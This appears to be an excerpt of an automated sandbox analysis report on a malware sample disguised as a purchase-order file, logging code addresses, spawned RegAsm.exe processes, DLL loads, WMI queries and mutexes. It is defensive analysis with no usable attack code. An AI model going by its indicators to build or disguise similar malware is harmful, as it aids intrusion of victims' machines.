Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657975F9C	26_2_00007FF657975F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65791FFA8	26_2_00007FF65791FFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65790DFB4	26_2_00007FF65790DFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657901FA8	26_2_00007FF657901FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657955ED0	26_2_00007FF657955ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796BE48	26_2_00007FF65796BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657952DD4	26_2_00007FF657952DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657971E00	26_2_00007FF657971E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796DD9C	26_2_00007FF65796DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657951D78	26_2_00007FF657951D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657923CE0	26_2_00007FF657923CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796CCC8	26_2_00007FF65796CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578F9CFC	26_2_00007FF6578F9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657911D00	26_2_00007FF657911D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796BC60	26_2_00007FF65796BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657913C87	26_2_00007FF657913C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657921C10	26_2_00007FF657921C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657969B34	26_2_00007FF657969B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65791AA68	26_2_00007FF65791AA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796BA74	26_2_00007FF65796BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657920AB0	26_2_00007FF657920AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796D9D0	26_2_00007FF65796D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578FB944	26_2_00007FF6578FB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657971950	26_2_00007FF657971950

PE file contains strange resources

Source: LISTA DE PEDIDO DE COMPRA.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Section loaded: edgegdi.dll	Jump to behavior

Uses 32bit PE files

Source: LISTA DE PEDIDO DE COMPRA.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Deletes files inside the Windows folder

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: String function: 00007FF657900DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: String function: 00007FF657900D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: String function: 00007FF65795BAAC appears 36 times

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65790C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,	26_2_00007FF65790C444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657909FF0 NtSetInformationFile,	26_2_00007FF657909FF0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657915DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,	26_2_00007FF657915DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657915B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,	26_2_00007FF657915B80

Source: mpasdlta.vdm.25.dr	Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.25.dr	Static PE information: No import functions for PE file found

Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240243274.0000000000415000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe
Source: LISTA DE PEDIDO DE COMPRA.exe	Binary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe

Source: unknown	Process created: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5540:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3480:120:WilError_03

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_0040747B pushfd ; ret	1_2_00407495
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_0040401B push ds; ret	1_2_00404027
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_00406946 push ebx; ret	1_2_0040694C
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_004085A7 push edx; ret	1_2_004085A8
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_02273A1F push esi; iretd	1_2_02273A20
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_0227106C pushfd ; retf	1_2_022710AA
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_02270EAE push edx; retf	1_2_02270EAF
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_02272CC4 push ds; ret	1_2_02272CCA
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Code function: 1_2_02272F47 push esp; iretd	1_2_02272F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00A3C43D push FFFFFFB9h; retf	10_2_00A3C448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00A3C41E push FFFFFFB9h; retf	10_2_00A3C429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C9824E8 pushfd ; iretd	10_2_1C982531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEAF8B8 pushad ; iretd	10_2_1FEAF8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA7088 push esp; iretd	10_2_1FEA7089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA708C pushfd ; iretd	10_2_1FEA7171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA703C pushad ; iretd	10_2_1FEA7081

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm			Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm			Jump to dropped file

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
